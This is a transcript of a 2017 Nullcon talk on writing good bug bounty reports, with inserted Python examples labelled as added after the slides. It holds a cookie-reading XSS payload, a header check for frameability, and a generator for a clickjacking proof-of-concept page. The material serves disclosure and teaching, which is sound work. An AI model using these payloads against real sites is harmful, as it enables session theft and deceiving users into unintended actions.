Bounty Craft: Bug bounty reports how do they work, @sushihack presents at Nullcon 2017


Transcript of Bounty Craft: Bug bounty reports how do they work, @sushihack presents at Nullcon 2017

Page 1

Bug Bounty Reports - How Do They Work?
Adam Bacchus, Chief Bounty Officer - HackerOne
Nullcon - March 2017

Page 2

AGENDA

1. Intro

2. Know your audience

3. The Report

4. Security Team 101

5. The Good, The Bad, The Ugly

6. Resources

7. Next Steps

8. Q & A

Page 3

Intro

Let’s get it started

Page 4

Adam Bacchus

Work
● Pentester (~4 years)
● Google (~4 years)
● Snapchat (~1 year)
● HackerOne (~1 year)

Play
● Gaming
● Playing with fire

Page 5

HackerOne

● Bug bounty platform where you can find organizations to hack on
● Uber, Twitter, Snapchat, Starbucks… tons more
● 100,000+ hackers to learn from, like our buddy geekboy :)
● $14 million USD (₹934M) in bounties paid to hackers!

Page 6

Why does this matter?

...better bug reports...

...better relationships...

...better bounties!

Page 10

Some Quick Terminology

Page 11

Vulnerability

a weakness in software, hardware, or an online service that can be exploited

Page 12

Report

an awesome write-up of the bug you’ve found

Page 13

Vulnerability Disclosure

the process by which an organization receives and disseminates information about vulnerabilities in their products or online services

Page 14

Bug Bounty Program

vulnerability disclosure, but with monetary incentives

Page 15

Security Team

the people reading and responding to your bug reports, handling vulnerability management, paying out bounties, etc.

Page 16

Know Your Audience

Page 17

“I don't believe in elitism. I don't think the audience is this dumb person lower than me. I am the audience.”

Quentin Tarantino

Page 18

Scope

What is it?

Page 19

Scope

● In scope: List of websites, apps, IoT devices, etc. that are okay to hack

Page 20

Scope

● Out of scope: Stay away!

Page 21

Scope

● Why are things out of scope?
  ○ Infrastructure can’t handle scans
  ○ Security team already knows it needs work
  ○ Security team is starting small and working their way up
  ○ Hosted by a third party; security team doesn’t control it

Page 22

Scope

What if I find a new scope?

Page 23

Scope

Don’t be afraid to ask!

But keep expectations low - they might not be ready for the new scope yet.

Page 24

SLA - Service Level Agreement

“an official commitment that prevails between a service provider and the customer. Particular aspects of the service – quality, availability, responsibilities – are agreed between the service provider and the service user.”

Page 25

A Service For Hackers

That’s right - a vulnerability disclosure/bug bounty program is a service, to you, the hacker.

Page 26

What should a security team provide?

How much time for…

...first response

...bounty decision

...remediation

Page 30

What if the security team doesn’t have SLAs?

Page 31

(didn’t we see this slide already?)

Don’t be afraid to ask!

“What’s your normal turnaround time on X?”

Page 32

What are typical SLAs?

First Response = 3 business days
Bounty Decision = 1 - 3 weeks after triage

Remediation depends on severity:
Critical = 1-2 days
High = 1-2 weeks
Medium = 4-8 weeks
Low = 3 months

Page 35

What NOT to do

1. Send report
2. Five minutes later... update plz!
3. Ten minutes later… bounty plz!

Page 36

The Report

Page 37

Reproduction Steps

Specific, detailed, step-by-step instructions on how to reproduce the vulnerability.

Page 38

Reproduction Steps - The Wrong Way

1. You got an XSS on the name… BOOM!!!
2. Where’s my bounty?

Page 39

Reproduction Steps - The Right Way

1. While logged in, navigate to your profile at <url>
2. Click the “Edit” button in the upper right
3. Change your first name to "><img src=x onerror=prompt(document.cookie)>
4. Click “Save”
5. Navigate to your profile at <url>, the XSS should fire
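The payload in step 3 starts with `">` for a reason: it closes the HTML attribute the stored name is written into, so the rest of the string becomes a tag of its own. The following is an added example, not code from the talk or from any program, showing the bug and the fix side by side in Python. The profile template and the field name are assumptions for illustration; the slides only mention a "first name" field at <url>.

```python
"""Added example (not from the slides): why the repro payload begins with `">`,
and what the remediation the team will ship looks like.

The template below is an assumption for illustration; the talk only refers to
a "first name" field on a profile page at <url>."""
import html

# The exact payload from the repro steps on the slide.
PAYLOAD = '"><img src=x onerror=prompt(document.cookie)>'


def render_profile_vulnerable(first_name: str) -> str:
    """The bug: the stored name is interpolated straight into a quoted
    attribute value. A leading `"` closes the attribute, `>` closes the tag,
    and the <img> that follows is parsed as real markup."""
    return f'<input id="first_name" value="{first_name}">'


def render_profile_fixed(first_name: str) -> str:
    """Same template with output encoding for the attribute context:
    html.escape(quote=True) turns " into &quot; and < into &lt;, so the
    value cannot break out of the attribute no matter what was stored."""
    return f'<input id="first_name" value="{html.escape(first_name, quote=True)}">'


def xss_fires(rendered_html: str) -> bool:
    """Crude repro oracle for a retest: does the attacker-controlled <img ...>
    appear as an actual tag (outside the attribute)? A browser would run its
    onerror handler; the encoded form &lt;img never matches."""
    return "<img src=x onerror=" in rendered_html


def demo() -> dict:
    """Before/after pair a report (or a retest after the fix) would document."""
    return {
        "vulnerable_fires": xss_fires(render_profile_vulnerable(PAYLOAD)),
        "fixed_fires": xss_fires(render_profile_fixed(PAYLOAD)),
        "fixed_output": render_profile_fixed(PAYLOAD),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

`demo()` returns True for the vulnerable render and False for the fixed one; that before/after pair is exactly what to paste into the report when the team asks you to confirm remediation, and the escaped output shows the reviewer which encoding context was missing.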

Page 40

Exploitability

How would a real attack work? Think like an attacker!

Page 41

Exploitability

If a vulnerability isn’t exploitable, how much does a security team care about it?

Page 42

Exploitability - The Wrong Way - Clickjacking

1. Navigate to <URL>
2. X-Frame-Options header is missing
3. ???
4. Profit?

Page 43

Exploitability - The Right Way - Clickjacking

1. Navigate to <URL>
2. X-Frame-Options header is missing
3. You can use clickjacking to trick a user into deleting their account. See attached HTML file for a PoC.
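Before the claim in step 2 goes into a report, check how a browser would actually decide framing: a Content-Security-Policy `frame-ancestors` directive overrides X-Frame-Options, a report-only policy blocks nothing, and obsolete or misspelled X-Frame-Options values (ALLOW-FROM included) are ignored by current browsers, which makes the page frameable. The following is an added example, not part of the talk or any program's tooling: a header check implementing those rules plus a generator for the kind of PoC HTML file the slide refers to. The header lists, URLs and button offsets are constructed for illustration.

```python
"""Added example (not from the slides): decide whether a page is really frameable
from its response headers, then build the PoC page the report should attach.
All header sets, URLs and pixel offsets below are constructed assumptions."""
from urllib.parse import urlsplit


def _origin(url: str) -> tuple:
    """(scheme, host) is enough for origin comparison here; default ports are ignored."""
    u = urlsplit(url)
    return (u.scheme.lower(), (u.hostname or "").lower())


def _xfo_values(headers) -> set:
    """All X-Frame-Options values, across repeated headers and comma-separated lists."""
    vals = set()
    for name, value in headers:
        if name.lower() == "x-frame-options":
            vals.update(v.strip().lower() for v in value.split(",") if v.strip())
    return vals


def _frame_ancestors(headers):
    """Source list of the enforced CSP frame-ancestors directive, or None if absent.
    Content-Security-Policy-Report-Only is deliberately skipped: it never blocks."""
    for name, value in headers:
        if name.lower() != "content-security-policy":
            continue
        for directive in value.split(";"):
            parts = directive.split()
            if parts and parts[0].lower() == "frame-ancestors":
                return [p.lower() for p in parts[1:]] or ["'none'"]
    return None


def _source_matches(src: str, attacker: tuple, target: tuple) -> bool:
    """Does one frame-ancestors source expression allow the attacker origin?"""
    a_scheme, a_host = attacker
    if src == "'none'":
        return False
    if src == "'self'":
        return attacker == target
    if src == "*":
        return True
    if src.endswith(":") and "/" not in src:          # scheme-source, e.g. https:
        return a_scheme == src[:-1]
    scheme, _, host = src.rpartition("://")            # host-source, e.g. https://*.example.com
    if scheme and scheme != a_scheme:
        return False
    host = host.split("/")[0].split(":")[0]
    if host.startswith("*."):
        return a_host.endswith(host[1:]) and a_host != host[2:]
    return a_host == host


def frameable_from(headers, target_url: str, attacker_origin: str) -> tuple:
    """Return (frameable, reason) for attacker_origin framing target_url.
    Order of precedence mirrors browsers: CSP frame-ancestors wins when present;
    otherwise DENY blocks, SAMEORIGIN blocks cross-origin, conflicting values
    block, and anything else (ALLOW-FROM, typos) is ignored; no header = frameable."""
    target, attacker = _origin(target_url), _origin(attacker_origin)
    ancestors = _frame_ancestors(headers)
    if ancestors is not None:
        allowed = any(_source_matches(s, attacker, target) for s in ancestors)
        return allowed, "CSP frame-ancestors is authoritative; X-Frame-Options ignored"
    xfo = _xfo_values(headers)
    if not xfo:
        return True, "no X-Frame-Options and no CSP frame-ancestors"
    if len(xfo) > 1:
        return False, "conflicting X-Frame-Options values; browsers refuse to render"
    value = next(iter(xfo))
    if value == "deny":
        return False, "X-Frame-Options: DENY"
    if value == "sameorigin":
        return attacker == target, "X-Frame-Options: SAMEORIGIN"
    return True, f"X-Frame-Options '{value}' is invalid or obsolete and is ignored"


def clickjacking_poc(target_url: str, top_px: int, left_px: int) -> str:
    """The PoC file to attach: a transparent frame of the target laid over a decoy
    button, so the victim's click lands on the real control (e.g. 'Delete account').
    The offsets are assumptions; tune them until the target's button sits under the decoy."""
    return (
        "<!doctype html><html><body>\n"
        f'<button style="position:absolute;top:{top_px}px;left:{left_px}px;z-index:1">'
        "Claim your prize</button>\n"
        f'<iframe src="{target_url}" style="position:absolute;top:0;left:0;'
        'width:1200px;height:900px;opacity:0;z-index:2"></iframe>\n'
        "</body></html>\n"
    )
```

Loading the generated page in a browser is still the proof the slide asks for: if the target sets its session cookie with SameSite=Lax, the framed page loads logged-out and the click does nothing, so a missing header alone is not an exploitable finding.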

Page 44

Exploitability - The Wrong Way - Server Info

1. Your server at <IP> is showing banner information and is out of date.
2. ???
3. Profit?

Page 45

Exploitability - The Right Way - Server Info

1. Your server at <IP> is running an outdated version of <software>.
2. I’ve verified it’s vulnerable to a known XSS which can be used to steal <cookie ID> and hijack users’ sessions. Here are the repro steps.

Page 46

Impact

We know how to repro…
We know exploitability / attack vector…

So now what?

Page 47

Impact

What happens if this vulnerability gets exploited?

What does the security team care about most?

Page 48

Put yourself in the organization’s shoes

Industry | Compliance | What they care about
Healthcare | Health Insurance Portability and Accountability Act (HIPAA) | PII (Personally Identifiable Information), e.g. patient data
eCommerce / Retail | Payment Card Industry Data Security Standard (PCI-DSS) | User data, especially credit card info
Government (U.S.) | The Federal Information Security Management Act (FISMA) | Employee info, classified info
Finance | Gramm-Leach-Bliley Act (GLBA), PCI-DSS | Consumer and investor financial data
Education | Family Educational Rights and Privacy Act (FERPA) | Student records
Technology | It depends! | It depends!

Page 49

Put yourself in the organization’s shoes

User information disclosure of first and last name. Where is the impact bigger?

or...

Page 51

Impact - The Wrong Way

1. You have an XSS
2. <repro steps>
3. <exploitability info>
4. …
5. Profit?

Page 52

Impact - The Right Way

1. Here’s a PoC to steal session info via XSS
2. Exploiting this against a regular user would allow access to view and modify their name, address, birthdate, as well as transfer all money out of their account.

Page 53

Impact

What is CIA?

Confidentiality - Integrity - Availability

Page 54

Confidentiality

“...information is not made available or disclosed to unauthorized individuals, entities, or processes.”

Page 55

Integrity

“Ensuring data cannot be modified in an unauthorized or undetected manner.”

Page 56

Availability

“Information must be available when it is needed.”

Page 57

Impact - CIA

Think about how your vulnerability impacts the Confidentiality, Integrity, and Availability of the organization’s assets.

Page 58

“The Bar”

What is it?

Page 60

“The Bar”

The minimum severity vulnerability that qualifies for a program.

Page 61

“The Bar”

Every organization cares about different things.

It’s all about context.

Page 62

“The Bar”

Ask yourself:

“If I were the security team, is this important enough that I’d want to bother a developer to fix it?”

Page 63

“The Bar”

So you’ve found clickjacking on a page with only static content?

Page 64

“The Bar” - Open Redirects

Is Open Redirect technically a vulnerability? Yes.

Does company XYZ care? Probably not.

Why not?

Page 65

“The Bar” - Logout XSRF

Is Logout XSRF technically a vulnerability? Yes.

Does company XYZ care? Probably not.

Why not?

Page 66

“The Bar”

Vulns can be 100% accurate, but so what?

Page 67

(this slide AGAIN!?)

Don’t be afraid to ask!

“Do you care about vulnerabilities like X?”

Page 68

Public Disclosure

What is it?

After the bug is fixed, the security team and hacker agree to disclose the report as an example for the bug bounty community.

Page 69

The Good, The Bad, The Ugly

Bug Bounty Reports IRL

Page 70

Reports IRL - The Good, The Bad, The Ugly

Let’s take a look at some real life examples...

Page 71

The Good - hackerone.com/reports/143717

Report: Changing any Uber user’s password
Bounty: $10,000 USD

Let’s check it out!

Page 72

The Bad - hackerone.com/reports/156098

Report: XSS At "pages.et.uber.com"
Bounty: um...

Page 76

The Ugly - hackerone.com/reports/137723

Report: “vulnerabilitie”
Bounty: we get to laugh at the report?

Let’s check it out!

Page 77

Resources

Page 79

Hacktivity! https://hackerone.com/hacktivity

Page 80

Recap

Page 81

Quick Recap

Know your audience! Think from the security team’s perspective

“I am the audience”

Repro + Exploitability + Impact

Ask questions, get clarity

Page 82

Any questions?

Page 83

Thank You

Adam Bacchus
[email protected]
@sushihack
linkedin.com/in/adambacchus/
facebook.com/sushihack
